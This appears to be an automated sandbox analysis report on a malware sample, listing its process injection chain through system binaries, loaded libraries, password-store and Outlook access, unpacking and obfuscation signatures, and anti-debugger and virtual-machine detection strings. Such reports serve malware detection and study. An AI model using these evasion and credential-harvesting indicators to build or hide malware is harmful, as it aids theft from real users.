Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: OpenWith.exe, 0000000F.00000003.2075945157.000001F0D7651000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2076104361.000001F0D7651000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2076270773.000001F0D7610000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: OpenWith.exe, 0000000F.00000003.2036496149.000001F0D6EF4000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2029677314.000001F0D71F9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320562962.00007DF4E582F000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2319549882.000001F0D7477000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: nF54KOU30R.exe ReversingLabs: Detection: 57%
Source: nF54KOU30R.exe Virustotal: Detection: 60%
Source: unknown Process created: C:\Users\user\Desktop\nF54KOU30R.exe "C:\Users\user\Desktop\nF54KOU30R.exe"
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 516
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 552
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1864
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
Source: C:\Program Files\Windows Media Player\wmplayer.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe" Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe" Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe" Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe" Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Section loaded: certmgr.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: tapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\dllhost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\nF54KOU30R.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\7.0\Outlook\Profiles\Outlook Jump to behavior
Source: nF54KOU30R.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: nF54KOU30R.exe Static file information: File size 5007872 > 1048576
Source: nF54KOU30R.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x489800
Source: nF54KOU30R.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: nF54KOU30R.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2. source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb$I` source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdb source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdb source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: win32u.pdb source: wmplayer.exe, wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: win32u.pdbGCTL source: wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 15.3.OpenWith.exe.1f0d742aad0.19.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.19.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.24.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.24.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.2.OpenWith.exe.1f0d7609d60.1.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.2.OpenWith.exe.1f0d7609d60.1.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.11.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.11.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.20.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.20.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.27.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.27.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d7609d60.30.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d7609d60.30.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.1.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.1.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.10.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.10.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.6.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.6.raw.unpack, Runtime.cs .Net Code: CoreMain
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03D6FF22 push edi; iretd 0_3_03D6FF2D
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03D68964 push ebx; retf 0_3_03D68965
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03D6750E push ds; iretd 0_3_03D67517
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03D694E9 push cs; retf 0_3_03D69565
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D3E4E push edi; iretd 5_3_025D3E55
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D5CD2 push dword ptr [edx+ebp+3Bh]; retf 5_3_025D5CDF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D3B74 pushad ; retf 5_3_025D3B83
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D4305 push F693B671h; retf 5_3_025D430A
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D0FCE push eax; retf 5_3_025D0FCF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D4FC8 push es; ret 5_3_025D4FC9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D45FC push esi; ret 5_3_025D4600
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D21EF push ecx; iretd 5_3_025D21FB
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D21AF pushad ; ret 5_3_025D21B7
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5749D1E push esi; retf 000Ah 15_3_00007DF4E5749D1F
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5744CA0 push edx; ret 15_3_00007DF4E5744CAB
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5A0DDD push edx; iretd 17_2_000001D3CF5A0DDE
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5A0314 push ecx; iretd 17_2_000001D3CF5A0316
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5A0922 push es; ret 17_2_000001D3CF5A0925
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Windows Media Player\wmplayer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU""
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHA
Contains functionality to detect virtual machines (STR)
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E573AC1C str word ptr [eax-75h] 15_3_00007DF4E573AC1C
Contains functionality to query network adapater information
Source: C:\Windows\System32\dllhost.exe Code function: GetAdaptersInfo, 17_2_000001D3CF5A2AC4
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758E20 GetLogicalDriveStringsW, 15_3_00007DF4E5758E20
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57B7344 GetSystemInfo, 15_3_00007DF4E57B7344
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft Jump to behavior
Source: wmplayer.exe, 00000010.00000002.2882270249.00000203433F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpMAC
Source: dialer.exe, 00000005.00000002.1994333377.0000000002978000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: OpenWith.exe, 0000000F.00000003.2079140690.000001F0D7399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
Source: OpenWith.exe, 0000000F.00000003.2079140690.000001F0D7399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
